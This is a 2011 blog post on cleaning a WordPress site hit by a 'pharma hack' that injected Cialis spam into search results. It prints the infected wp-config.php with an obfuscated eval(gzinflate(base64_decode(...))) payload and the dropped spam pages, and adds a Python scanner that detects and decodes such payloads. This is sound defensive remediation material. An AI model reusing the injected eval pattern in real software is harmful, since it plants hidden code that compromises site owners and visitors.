Thursday, 26 May 2011

Cialis Found in WordPress Google Search Results and the Solution to Remove the Virus



On May 23rd 2011, when I searched Google.com using the keywords "Perbandingan Agama", a description of Cialis and a drugstore suddenly appeared for my website. It had been pharma-hacked. The result looked like this:

Perbandingan Agama - Media Islam - 3 kunjungan - 25 Mei - [ Terjemahkan laman ini ]

Generic Cialis Women Effects - Official Drugstore. 24h online support. Absolute privacy. Order 25 mg Cialis.Brand and Generic Pills. Generic Cialis Women ...

media-islam.or.id/category/perbandingan-agama/ - Tembolok –



There is a link that refers to:

http://ed-pills-online.com

If this domain is using Google hacks on other websites, I hope all search engines block it, and I hope the authorities in the US can catch its owner. And we as internet users should not buy products from the hacker's site.

After searching the internet, I finally got rid of the hack. The problem is solved; at least some keywords, such as sombong and riya, no longer show the pharma hack's description.

There is a possibility the virus entered through the freeshoutbox.net widget on my site; the link to freeshoutbox.net was dead at that time. If you want to check whether your website has been hacked, just search Google using the keywords: yourdomain cialis

Well, here is what I did to get rid of the virus:

1. I removed the file whois.dat, which contains:

whois.dat
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>We Always Have The Cheapest Offers In Our Pharmacy Store</title>
<LINK rel="stylesheet" href="http://ed-pills-online.com/themes/blue/css/style.css" type="text/css">
<script type="text/javascript" src="http://ed-pills-online.com/themes/card.js"></script>
<!-- SESSION INFO -->
<script type="text/javascript">
var SessionType   = "URL";
var SessionPrefix = "39c9a48876fdaf665f3a57970e16a114";
var SessionName   = "USID";
</script>
<!-- /SESSION INFO -->
</head>
<body>
<!-- Top menu and cart -->
<!--  Pre-loaded images  -->
<div style="position:absolute;width:1px;height:1px;overflow:hidden;top:-20px;left:-20px;">
<img src="http://ed-pills-online.com/themes/blue/img/home_over.gif">
<img src="http://ed-pills-online.com/themes/blue/img/bestsellers_over.gif">
<img src="http://ed-pills-online.com/themes/blue/img/all_products_over.gif">
<img src="http://ed-pills-online.com/themes/blue/img/faq_over.gif">

2. I deleted the lines in wp-config.php starting from: eval (gzinflate(base64_decode(

wp-config.php
<?php
/** WordPress's config file **/
/** http://wordpress.org/   **/

// ** MySQL settings ** //
define('WP_CACHE', true); //Added by WP-Cache Manager
define('DB_NAME', 'xxxdb');     // The name of the database
define('DB_USER', 'xxxi');     // Your MySQL username
define('DB_PASSWORD', 'xxx'); // ...and password
define('DB_HOST', 'mysql.dreamxxx.usefulz.com');     // ...and the server MySQL is running on

// Change the prefix if you want to have multiple blogs in a single database.
$table_prefix  = 'wp_yzpa03_';   // example: 'wp_' or 'b2' or 'mylogin_'

// Change this to localize WordPress.  A corresponding MO file for the
// chosen language must be installed to wp-includes/languages.
// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');

/* Stop editing */

$server = DB_HOST;
$loginsql = DB_USER;
$passsql = DB_PASSWORD;
$base = DB_NAME;

// Injected by the pharma hack: decodes and executes hidden PHP at every page load
eval (gzinflate(base64_decode(
'Hc7BisIwEADQu+A/eKuCdkRbqSgWF1YU9iDoPUybqR1pMjFJEfx6y97f4ZWHfela'
.'Nx55evXsSYmtaZpAK4YAH32w/EHDYEgzLjh0aFLxKWt4u0UtNpKNEFsyFAAjtj12'
.'DtfZCsRFFhvgGWrpxEPtJQRodLbJ14hVsaFC5xUWVd6scp0tCbfpEElmu/FIU8N2'
.'WBx/btfj/ZzMJ5q9RUNTpU6Xv1+lZmkC/7Qc/l8=')));

// Get everything else
require_once(ABSPATH.'wp-settings.php');
?>

Well, you should find all files that contain eval (gzinflate(base64 in your WordPress directory, since the virus could attack different programs.

3. I deleted the following folder in my theme, since all the files in the folder refer to the Cialis website. Try to find all such files using the keyword "Drugstore":

File: /media-islam.or.id/wp-content/themes/atahualpa342/options/jscolor/cross/ffa193430d11bdecb2275621b7dbd213

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<title>Generic 15 mg Cialis - Cheap High-Quality Pills.</title>
<meta name="keywords" content=" Generic 15 mg Cialis Generic Cialis on-line medication">
<meta name="description" content="Generic 15 mg Cialis - Official Drugstore. 24h online support. Absolute privacy. Order 25 mg Cialis.Brand and Generic Pills. Order Cialis com">
</head>
<body>
<table width="100%"  border="0" cellspacing="0" cellpadding="0" height="691">
<tr valign="top">
<td width="260" height="132" bordercolorlight="#808080" bordercolordark="#C0C0C0" bgcolor="#C0C0C0">
<p align="center"><a href="http://www.media-islam.or.id/category/usaha-muslim/" title="order 20 mg cialis">order 20 mg cialis</a><br>
<a href="http://www.media-islam.or.id/page/2/" title="order cialis in holland">order cialis in holland</a><br>

4. I don't know if there is a connection with the virus, but I deleted the folder net2ftp_temp in Wordpress/wp-content/plugin

5. I reinstalled WordPress with the newest version, and rechecked the files above again.

6. I reinstalled my theme with the newest version.
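Steps 2 and 3 boil down to two checks that are easy to script: find every file under the WordPress directory that contains eval (gzinflate(base64_decode( or the spam keyword, and read what the injected line actually does without running it. The Python script below is an added example and is not code from the original post or from WordPress; the sample directory tree, file names and file contents it builds are constructed for illustration. It relies on the fact that PHP's gzinflate() is raw DEFLATE, so zlib can unpack the base64 blob when told to expect no header.

```python
"""Find pharma-hack artifacts in a WordPress tree and decode the injected
eval(gzinflate(base64_decode('...'))) line without executing it.

Added example; not code from the original post or from WordPress. The sample
tree written by build_sample_site() is constructed for illustration.
"""
import base64
import os
import re
import tempfile
import zlib

# Signature of the injected line in wp-config.php (step 2).
OBFUSCATION_RE = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
# Words from the dropped spam pages (steps 1 and 3).
SPAM_KEYWORDS = ("Drugstore", "Cialis")
# The base64 argument, possibly split over dot-concatenated quoted chunks.
PAYLOAD_RE = re.compile(r"base64_decode\s*\(\s*((?:'[A-Za-z0-9+/=]*'\s*\.?\s*)+)\)")


def decode_payload(php_source):
    """Return the PHP hidden inside eval(gzinflate(base64_decode(...))) as text.

    gzinflate() is raw DEFLATE, so zlib is told to expect no header (wbits -15).
    The result is returned for reading only; nothing is evaluated.
    """
    m = PAYLOAD_RE.search(php_source)
    if not m:
        raise ValueError("no base64_decode(...) payload found")
    b64 = "".join(re.findall(r"'([A-Za-z0-9+/=]*)'", m.group(1)))
    return zlib.decompress(base64.b64decode(b64), -15).decode("utf-8", "replace")


def scan_tree(root, exts=(".php", ".html", ".htm", ".dat", "")):
    """Walk root and return {relative_path: [reasons]} for suspicious files.

    Extension-less files are included because the dropped spam pages had
    hash-like names with no suffix.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in exts:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            reasons = []
            if OBFUSCATION_RE.search(text):
                reasons.append("eval(gzinflate(base64_decode(")
            reasons += ["keyword:" + kw for kw in SPAM_KEYWORDS if kw.lower() in text.lower()]
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings


def make_payload(php_code):
    """Build an eval(gzinflate(base64_decode('...'))) line from plain PHP.

    Used only to construct test input; it mirrors the shape of the injected
    line in the post (base64 over raw DEFLATE, split into quoted chunks).
    """
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    b64 = base64.b64encode(comp.compress(php_code.encode()) + comp.flush()).decode()
    chunks = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "eval (gzinflate(base64_decode(\n'" + "'\n.'".join(chunks) + "')));"


# Constructed path for the spam page; the real one had a hash-like name.
SPAM_PAGE = os.path.join("wp-content", "themes", "t", "cross", "0123456789abcdef")


def build_sample_site(root):
    """Write a constructed mini WordPress tree: one clean file, two infected ones."""
    os.makedirs(os.path.join(root, "wp-content", "themes", "t", "cross"))
    with open(os.path.join(root, "wp-content", "index.php"), "w") as fh:
        fh.write("<?php\n// Silence is golden.\n")
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'xxxdb');\n"
                 + make_payload("<?php /* constructed stand-in for the injected code */ ?>")
                 + "\nrequire_once(ABSPATH.'wp-settings.php');\n")
    with open(os.path.join(root, SPAM_PAGE), "w") as fh:
        fh.write("<html><title>Official Drugstore</title></html>\n")


def run_demo():
    """Build the sample tree in a temp dir, scan it and decode the payload."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        findings = scan_tree(tmp)
        with open(os.path.join(tmp, "wp-config.php"), encoding="utf-8") as fh:
            decoded = decode_payload(fh.read())
    return findings, decoded


if __name__ == "__main__":
    found, code = run_demo()
    for path in sorted(found):
        print(path, "->", ", ".join(found[path]))
    print("decoded:", code)
```

Point scan_tree() at a real WordPress root to get the list of files worth inspecting, and feed the text of a flagged file to decode_payload() to see the hidden PHP as plain text. Nothing is ever executed, so the same approach can be applied to the wp-config.php shown above before the lines are deleted.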

Then, thank God, when I searched another keyword such as sombong or riya in Google, the Cialis ads did not appear. If they still appear for Perbandingan Agama, that is probably because of Google's cache at that time.

Thanks to these websites, which gave me inspiration and helped me a lot!

http://www.seobook.com/wordpress-blog-hacking-checklist

http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html

3 comments:

  1. Hi,
    Yes, often this is the only real option (starting fresh).
    What I do for my clients who have been so badly hacked that updates and the like no longer work is to set up an account at a separate secure hosting company, like TVC.Net, install a virgin blog, then copy over the database. That "fixes" the problem nicely.

    "Friends should not let friends get hacked"

    Best Wishes,
    Jim Walker
    The Hack Repair Guy

  2. Fresh install is the best solution.
    Yet, I do it only as a last solution.

  3. You will find shoe lifts available in a wide selection of supplies

    http://4321.in/userinfo.php?uid=6028
